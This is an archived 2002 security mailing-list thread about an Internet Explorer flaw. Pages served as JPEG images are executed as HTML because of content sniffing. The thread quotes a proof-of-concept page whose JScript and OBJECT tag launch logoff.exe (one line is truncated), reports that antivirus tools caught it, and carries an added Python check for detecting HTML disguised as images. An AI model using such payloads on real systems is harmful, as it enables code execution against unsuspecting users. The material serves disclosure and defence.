Re: [Re: Rather large MSIE-hole] another variant (NAV and Finjan block this)

From: David Barnett (dbarn064at_private)
Date: Sat Mar 16 2002 - 06:57:47 PST


    I am running Win 2k SP2 with MSIE 5.5 and MSIE 6.0, both with current
    patches. I also have Norton AV and Finjan SurfinGuard Pro running, both of
    which caught the "exploit" and prompted me for further action. NAV alerted
    me to the exploit but still let it run; Finjan outright blocked it from running.
    
    ----- Original Message -----
    From: "NoCoNFLiC" <noconat_private>
    To: "Magnus Bodin" <magnusat_private>
    Cc: <vuln-devat_private>
    Sent: Friday, March 15, 2002 5:49 PM
    Subject: FW: [Re: Rather large MSIE-hole] another variant
    
    
    > [magnusat_private] Tue, Mar 12, 2002 at 11:32:20AM +0100 wrote:
    > >
    > > The latest MSIE-hole is now spreading.
    > >
    > > THE ATTACHED HTML-code is served as a jpeg-file, and as MSIE ignores the
    > > Content-Type if it "thinks" it knows better, then the code is executed.
    > > This in combination with the malicious code that is possible to run, then
    > > an "innocent.jpg" with the following content will log off an XP-user.
    > >
    > > --%< cut here-----
    > > <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    > > <HTML>
    > > <HEAD>
    > > <TITLE>IE6 security...</TITLE>
    > >
    > > <META http-equiv=Content-Type content="text/html; charset=windows-1252">
    > > <SCRIPT language=JScript>
    > >
    > > var programName=new Array(
    > >     'c:/windows/system32/logoff.exe',
    > >     'c:/winxp/system32/logoff.exe',
    > >     'c:/winnt/system32/logoff.exe'
    > > );
    > >
    > > function Init(){
    > >     var oPopup=window.createPopup();
    > >     var oPopBody=oPopup.document.body;
    > >     var n,html='';
    > >     for(n=0;n<programName.length;n++)
    > >         html+="<OBJECT NAME='X'
    > > CLASSID='CLSID:11111111-1111-1111-1111-111111111111' C
    > >     oPopBody.innerHTML=html;
    > >     oPopup.show(290, 390, 200, 200, document.body);
    > > }
    > >
    > > </SCRIPT>
    > > </head>
    > > <BODY onload="Init()">
    > > You should feel lucky if you dont have XP right now.
    > > </BODY>
    > > </HTML>
    > > --%< cut here-----
    > >
    > >
    > > --
    > > magnus                               MICROS~1 BOB was written in Lisp.
    > >             http://x42.com/
    >
    >
    >    Just passing this along, as some may not be on the sec-basics list.
    >
    > -----Original Message-----
    > From: Sprissler, Noah [mailto:NSPRISSLERat_private]
    > Sent: March 12, 2002 10:31
    > To: security-basics@security-focus.com
    > Subject: RE: scary site
    >
    > That's interesting.  I have disabled active scripting as most have suggested
    > and the http://www.liquidwd.freeserve.co.uk/ link stops bringing up a DOS
    > prompt.  However, if I go to this link from Greymagic
    > http://security.greymagic.com/adv/gm001-ie/simplebind.html their
    > implementation of this works fine no matter what settings I disable. Win2k
    > with all patches, IE6 with all patches.
    >
    > -Noah
    >
    > -----Original Message-----
    >
    > --
    >
    > - nocon
    >
    > ======================================
    >
    > noconat_private
    > http://nocon.darkflame.net
    >
    > ======================================
    >
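
The quoted report above turns on HTML being served under a JPEG Content-Type and rendered anyway because the browser trusts its own content sniffing over the header. The following is an added example, not part of the original thread and not how NAV or Finjan work: a check an upload handler or filtering proxy could apply to declared images. The names `classify`, `IMAGE_MAGIC` and `SNIFF_WINDOW`, the window size, and the sample bytes are all assumptions constructed for this illustration.

```python
import re

# Leading bytes ("magic numbers") of the image types this check covers.
IMAGE_MAGIC = {
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/gif": (b"GIF87a", b"GIF89a"),
    "image/png": (b"\x89PNG\r\n\x1a\n",),
}

# Markup tokens that a content-sniffing browser may interpret as HTML.
HTML_TOKENS = re.compile(
    rb"<\s*(!doctype|html|head|body|script|object|iframe|meta|title)\b",
    re.IGNORECASE,
)

SNIFF_WINDOW = 1024  # bytes inspected; an assumption chosen for this example


def classify(declared_type: str, body: bytes) -> str:
    """Return 'ok', 'html-as-image' or 'mismatch' for one response or upload."""
    declared = declared_type.split(";")[0].strip().lower()
    magics = IMAGE_MAGIC.get(declared)
    if magics is None:
        return "ok"  # not declared as an image; out of scope for this check
    head = body[:SNIFF_WINDOW]
    # Look for markup first, so an image header followed by HTML is also caught.
    if HTML_TOKENS.search(head):
        return "html-as-image"
    if not head.startswith(magics):
        return "mismatch"  # no markup, but not a valid header for the type
    return "ok"


# Constructed samples: the harmless opening of the quoted page, and a JPEG header.
HTML_AS_JPEG = b'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">\n<HTML>'
REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32

if __name__ == "__main__":
    for name, ctype, data in [
        ("innocent.jpg", "image/jpeg", HTML_AS_JPEG),
        ("photo.jpg", "image/jpeg", REAL_JPEG),
    ]:
        print(f"{name}: {classify(ctype, data)}")
```

A server can additionally send `X-Content-Type-Options: nosniff`, a header introduced in later browsers, so that the declared type is not overridden by sniffing.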
    



    This archive was generated by hypermail 2b30 : Sun Mar 17 2002 - 00:05:44 PST